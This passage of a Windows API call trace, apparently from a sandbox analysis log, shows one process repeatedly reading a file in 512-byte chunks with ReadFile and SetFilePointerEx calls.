lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.627] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.627] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.627] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.628] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.628] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.628] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.629] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.629] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.629] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.630] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, 
lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.631] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.632] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, 
lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.633] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.634] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.635] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.635] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.635] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.636] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.636] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.636] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
